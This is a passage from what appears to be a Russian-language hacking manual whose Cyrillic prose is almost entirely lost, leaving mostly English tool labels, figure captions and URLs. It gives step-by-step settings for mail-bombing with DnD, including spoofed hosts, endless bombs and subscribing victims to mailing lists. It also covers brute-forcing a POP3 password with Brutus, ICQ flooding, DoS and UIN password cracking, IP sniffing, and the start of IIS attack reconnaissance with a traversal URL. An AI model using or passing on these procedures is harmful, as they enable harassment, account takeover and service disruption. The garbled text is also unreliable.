Email Bombing is rarely damaging to the target but is always damaging to smtp hosts. I do NOT condone mailbombing as it causes problems for SysAdmins of servers. I did not make this program for people to blast away at each other. PLEASE use it responsibly, and if you HAVE to email bomb, then please use the option to randomly switch servers in between messages; as it lightens the loads on the server. Have fun and don't ruin a good sysadmins time by flooding his server!
Puc. 6.1. DnD DnD, , 11.
, ( ).
.
.
DnD Settings(), DnD (. . 6.1).
DnD Settings ()
:
> SMTP Host ( SMTP) , SMTP,
. SMTP Sword2000.sword.net.
> Spoof Host ( ) , . , .
Randomly Change (
) , SMTP.
> SMTP, Edit Server List (
Puc. 6.2. SMTP
). RandomServer List ( ), . 6.2.
SMTP Random Server List ( ) . Submit().
Size of Bomb ( ) (. 6.1) :
# of messages to send ( ) . 10.
Never ending bomb ( ) .
Puc. 6.5. MIME
13 , DnD
, .
, ,
.
, Clone ()
EMail bomb ( ) Bomber Spawn 1 (
), . 6.6.
Puc. 6.6.
, Bomber Spawn 1 ( ) EMailbomb ( )
SMTP.
,
SMTP.
, !
.
,
, (
).
> , Dn D Clones Load M u l t i Clones ( *
). Number of clones(), . 6.7
Puc. 6.7.
!
> Number of clones ( ) ( 56) .
Bomber Spawn ( ), 1
.
Send Bomb ( ) .
& & ! ,
,
! DnD , , Mailing lists ( ). Subscribe
joe lamer to mailing list( ), . 6.8, , Euro Queer ( ), Mormons (), Family Medicine
( ) !
Puc. 6.8. DnD DnD . TargetEmail Address ( ), Subscribe em() . , .
, , DnD , , , . , Extras Pword generator ( * ). Randomic Password Generator ( ), . 6.9.
, How many characters? (?) ( 8 ) : Use Both ( )
, Use numbers ( )
Use letters ( ) . , ,
.
Extras ()
69 SMTP ( SMTP Remote ( SMTP)), ( Raw Port ( )). , ( , SMTP). Other Tools( ) . , ,
.
, ; . , , . , ( ). , .
. , , (IMAP) , . .
Brutus Authentication Engine Test 2 (Brutus , 2), Brutus AET2 (http://www.hobie.net/brutus). . 6.10
Brutus, , FTP, HTTP, Telnet
NetBus.
Puc. 6.10. Brutus , Brutus ( 8 Brutus IIS). , alex1.sword.net, kolia. , ,
, .
.
Brutus 2 (. 6.10) Target () , alex1.sword.net.
> () , .
Connection Options ( ) Use Proxy ( ), .
> Authentication Options ( ) Single User( ) .
User file ( ) , .. kolia.
> Pass Mode ( ) Brute Force( ). B rutus , .6.11.
Puc. 6.11. Brutus POP3 Range (). Range () Brutus Brute Force Generation (Brutus ),
. 6.12.
Puc. 6.12.
Brutus Brute Force Generation (Brutus ) , , . , , M in Length ( ) 3, Max Length( ) 4. , Digits only
( ). .
> Start () Brutus 2 Brutus 2. . 6.13.
Puc. 6.13. 1.
Positive Authentication Results ( ) , kolia 0007. , Brutus 10997 alex1.sword.net ( 11000). 5 Pentium 3 1000 , Ethernet 10 /.
,
, Brutus (
). , , , ( 8 ), , (, &$ ..). ! Brutus Brute Force Generation (Brutus ) 8 ,
Full Keyspace ( ). Start() Brutus 2 6 095 689 385 410 816 , !
12 ?
, , , (., , [10]). Brutus,
PassMode ( ). ( 100 000), , . , password, p a r o l , MyPassword Web
.
, , , Ethernet, 3050 / ( ). . , , , , .
. , , , , , . . , .
IIS Brutus 8 , . , , . , , ,
, ! : . .
, , , . 1, , , , . , , , , . , ( ),
.
, , . . , TFTP 11 , 11 . , TFTP , . TFTP , ,
, . , , , , , .
. , ,
( ) . , , , Web .. ( , ).
. , , ,
. . , .. , , , . , ..
, . , 2002 ., , , . Web. . . . .. ( ). Web, , ?, . , , ?, ?, ? . , , , , . , , , , ,
. , , , , repa_parenaia, !
. , ,
, ,
.
, , ,
, .
.
,
.
,
. , (
) ,
.
,
8 ( 12) , , .
,
Dn D. .
,
, Norton Antivirus
McAfee VirusScan. ,
PGP Desktop Security.
,
.
, , , , .
, .
7 .
ICQ ICQ Intelligent Call Query,
.
ICQ [] : I Seek You ; , ICQ . ICQ
,
1998 Mirabilis,
( 40 ) AOL.
ICQ ,
ICQ ,
, .
, , ICQ,
,
. , , .
ICQ ,
ICQ.
ICQ , ICQ, ,
http://www.ICQ.com, http://mirabilis.com. ICQ ICQ , ,1998,1999,2000,2002, ICQ 2003. ICQ
UDP, 4000,
TCP, .
, ICQ,
UIN (Unique Identification Number ). UIN ICQ ,
.
, ICQ?
ICQ ,
. , ? .
, ICQ, . ,
ICQ ICQ .
, ICQ,: , UIN ,
, . , ICQ , ICQ . , , .
ICQ, , IP ICQ, , . ,
, DoS, 9 . , IP ICQ, , ICQ.
! , ICQ, . , , ,
, .
ICQ, Mirabilis . ICQ,
ICQ , .
, .
ICQ
. , ICQ
ICQ ICQ. , ICQ ;
, ICQ (, LameToy www.mirabilis.com). , ( ) , .
, , ,
, , . , ICQ.
. . Sword2000
ICQ Groupware Server, Alex ICQ Groupware Client, UESf, 1001, 11 , UIN, 1003. ICQ Groupware http://www.icq.com. ICQ, ICQ Groupware, , , 1. , ICQ , ICQ . ICQ ICQ, ICQ, ICQ.
UIN ICQ UIN ICQ, , UIN . UIN . , , . , .
, , . ( ) LameToy for ICQ(DBKILLER), , , ( http://icq.cracks.ru/attack.shtml). LameToy for ICQ , , .
LameToy for ICQ. . 7.1 , LameToy for ICQ.
Puc. 7.1. LameToy for ICQ (DBKILLER) ICQ
LameToy for ICQ (DBKILLER) Send (). , Setting () Loop () , . UIN, UIN# Ran (Random
ICQ ). , , , , .
, ICQ, , UIN UIN. , ICQ (ICQ99a
ICQ99b) . DB( ) , DB Data Base , , DB NewDB. LameToy , DB killer ( DB) Setting (). ICQ,
.
, , LameToy, UIN , , , System Messenger ICQ Team (http://www.icqinfo.ru/softjcqteam.shtml), ICQ Sucker .
lf~ac)pecaICQ DoS ( ) , . , , , Advanced ICQ IP Sniffer ICQ Team ( Web, , http://www.icqinfo.ru/sofl_icqteam.shtml). . 7.2 Advanced ICQ IP Sniffer.
Puc. 7.2. IP ICQ
IP ICQ UIN, Advanced ICQ IPSniffer ICQ, UIN . , , Your UIN( UIN) Password() Advanced ICQ IP Sniffer ( ICQ). Check () , ICQ
UTN , Info() . , Info () . 7.2 , ( ) IP ICQ, TCP, ICQ . , , Ext IP ( ), IntIP ( IP) TCP Port ( TCP). , ICQ ( ). ICQ, Advanced IP ICQ Sniffer,
ICQserver's address and port( ICQ), Server () .7.3.
. 7.3. ICQ server's address and port ( ICQ) ICQ server's address and port ( ICQ) Mirabilis ICQ 4000. , / IP / .
ICQ, , , ICQ, ICQ ICQ. , ,
. , ICQ, ICQ MultiWar (http://www.paybackproductions.com/), ICQ Flooder (. 7.4).
Puc. 7.4. ICQ
ICQ Flooder, .> V i c t im ' s address ( ) IP
ICQ.
> ICQport ( ICQ) TCP.> , UIN .
:
U T N Randomly generated UIN( UIN), UIN UIN.
UIN Apparent source UIN( UIN ) UIN, ICQ .
No. of Messages ( ) ICQ.
> Message () ( , ).
> Send! () .
, ICQ, ,
,,
http://mht.hut.ru/icq/icq.html, ( , ,
ICQ , ).
ICQ ,
, , ! ICQ ICQ,
ICQ,
,
. ,
,
.
, , ICQ subMachineGun v1.4 (http://icq.cracks.ru/best.shtml), . 7.5.
Puc. 7.5. ICQ subMachineGun
U1N ICQ
bruteforce , ,
.
. ICQ ICQ subMachineGun .
> ICQ subMachineGun.> Settings * Connections&Cracking (
&). , . 7.6.
Puc. 7.6. UIN
icq server( ICQ) ICQ,
, I C Q L m i r a b i li s. s e r v e r . port ()
4000.
Cracking () :
Stop if successful ( ) ICQ.
Make log if cracked uins ( UIN) ICQ.
Reconnect if timeout ( ) ICQ .
Cut password length to 8 digits ( 8 ) 8 .
> set timeout ( ) 15 .
> relogin ( ) ICQ 3.
ICQ subMachineGun UIN . .
> ICQ subMachineGun Bruteforce( ) UIN. . Single
() UIN, .
Single() UIN.
UIN, (...) Making victims list ( ),
. 7.7.
Making victims list ( ) Range () , , UIN( 100000) ( 900900).
Puc. 7.7.
UIN
step () UIN ( 100). Generate() UIN; .
, Generate () UIN, , , .. Add () U IN .> UIN,
Open () UIN ( UIN ).
> UIN , t0*" . Clear () UIN ( ).
UIN, . .
> ICQ subMachineGun Bruteforce ( ) . .
Single ()
, .
Single () .
, (...) Make passlist( ), . 7.8.
Make passlist ( )
.> Open ()
( ). , ICQ.
Puc. 7.8.
v Generato r ( ) Add (). , .
> ,
0*"**]. Clear() ( ).
> , . .
Force (). , ICQ subMachineGun v1.4 (. 7.9).
Puc. 7.9.
ICQ subMachineGunv1.4, UIN, ( , . 7.9 ). , , 15 , ICQ. 45 , ( ). ,
, , , , .. . ...
( , , ICQ . ICQ , ICQ
. , ? ! , ? , ICQ , . , .
? , Windows. , . , ICQ , ICQ. I C Q , , ElcomSoft Advanced ICQ Password Recovery(http://www.elcomsoft.com).
, . . 7.10 Advanced ICQ PasswordRecovery.
Puc. 7.10. ICQ .dat
ICQ, Advanced ICQ Password Recovery ( ICQ) .dat, ICQ.
Puc. 7.11.
!
, , ICQ2002 2002. 2002 , UIN .dat,.., , 207685174.dat
(207685174 UIN ). ICQ Password successfully found! ( ICQ ), (.7.11). . 7.11, ICQ 99b 2000b, ICQ 2002 ( ).
, ICQ , , ICQ . , ,
(.[11]), Web (. 8). , , , .
, ICQ( ) , . , , , ICQ. , , ICQ , . , .
ICQ, . . , , I C Q
ICQ . , ICQ , UIN .
?
, , ,
,
. ,
, , , , , , ,
. ICQ , , ,
,
, ,
, ,
.
,.. ICQ, , ,
. ,
ICQ ICQ,
ICQ ( , ICQ Team
(http://www.lcqteam.com)). ICQ ICQ, ICQ ICQ.
, .
, ? ,
, . ,
,
? , ... , ,
, .
ICQ,
,
.
ICQ , .
ICQ ,
ICQ. ICQ
DoS ... .
ICQ
. , ,
ICQ, ICQ, ICQ. ICQ,
ICQ. IP
, ,
ICQ.
ICQ .
, ICQ, UTN
. , ICQ, , , BlackICE Defender, DoS.
, , .
,
. ,
ICQ
.
, ICQ, ICQ.
, IP ICQ,
. ,
.
, . ICQ
, PGP Desktop Security 2.9,
ICQ . ,
PGP ( [7]).
8. Webcaumoft Web? , Web ,
. Web , Web . , , , .
, Web , , , , . HTML Web ( ), , . HTML . ( ).
, Web, ,Web, , . HTTP, , , . Web, , .
, Web, DoS , , Yahoo. , Web,
, ( ) Web , . Web , .
W e b~ caum a Web Web , , Web, Web,
, .
Web Web, Web . Web ,
Web, Web . Web
, .
Web Web,, Internet Explorer (IE), HTML Web, HTTP, Web.
Web , IIS Microsoft, Apache HTTP Server Apache Software Foundation
. Web, ASP (Active Server Page ) CGI, , Java SUN, Apache Software Foundation . Web, Web, , . SQL Microsoft, Oracle Oracle .
, , , ODBC (Open Data Base Connectivity
). , , , , , ...
?
1 Web~cauma , Web, . , .
Web , , , , , Web .
Web Web , , TCP 80, , Web,
( CVE, Web),
Web .
Web ASP, Java, CGI , .
Web , , , , ( ). , , .
, , (cookie), , .
Web
, , . , , C G I , CGI , , , .
,
Web , . , Web
, , , .
, , , Web, Web, .
, (, . [])., , ,
, IIS 5. ,
( HTTP), CGI ( ) Web
( Web). Web , . IIS , Web, .
, Web , , . , Web. . , FTP
, , .
, .
Web .
Web~cauma , Web, . , , , , .
, , . ,
Web , , , DNS, .
Web.
, .
c p Web
.
.
, ,
,
.
IP, , ,
. Whols . , HTML
Web . HTML
, Web,
, .
, ,
, , JavaScript .
, HTML Web
Web Teleport Pro., , Whols , ,
Web.
whois (Unix), Web ,
whois Web.
WhoIs. , ,
. 1999
Network Solution (http://www.networksolution.com),
, , InterNic(http://www.internic.net).
/ . Web,
Whois ( ),
. Whois , ,
, DNS. , RIPE NCC (Network Coordinate Center ), IP
. Web RIPE NCC (http://www.ripe.net), .8.1.
. 8.1. Web RIPE NCC
IP Web
? DNS .
, SuperScan (http://www.foundstone.com), . 8.2.
SuperScan, .
> Start () .> Stop () .
> Scan type ( ) All list ports from( ).
> Start().
. 8.2.
SuperScan . , IP 1.0.0.1 HTTP I I S 5.0, Web. ( ), .
. 8.. IIS 5
Legion (http://packetstormsecurity.org/groups/rhinoS), 1.0.0.1 . 8.3., IIS 5, ,
? .
II5| I I S , HTTP (Hypertext Transfer Protocol
) CGI (Common Gateway Interface ), IIS, .
HTTP , , [12], Web
. HTTP , GET. Web (, ), GET, , ,http://www.anyserver.com/documents/order.html. order.html /documents IIS,
c:\inetpub\wwwroot\documents.
CGI , , [12], . HTTP, :
http://www.anysite.com/scripts/MyScript?napaMeTp1+napaMeTp2MyScript , /scripts IIS, a ?1+2 , MyScript. I I S , , , .
CGI, ASP(Active Server Pages ) ISAPI (Internet ServerProgramming Interface ). ASP :
http://www .anysite.com/scripts/MyScripts7napaMeTp1 =1& 2=2
MyScript.asp, , , HTML. ISAPI
, ISAPI.
HTTP:
http://www.anysite.com/isapi.111?1&2, IIS, , .
HTTP ,
II S . II S 2.0 :http://www.anysite.eom/.7.7.7.7.7winnt/secret.file Web , secret.txt.
Windows,
ACL.
IIS , Web
[3]. IIS
, ,
, , ,
SecurityLab.ru (http://www.securitylab.ru).
IIS, netcat (http://www.atstake.com), (netcat
[3] netc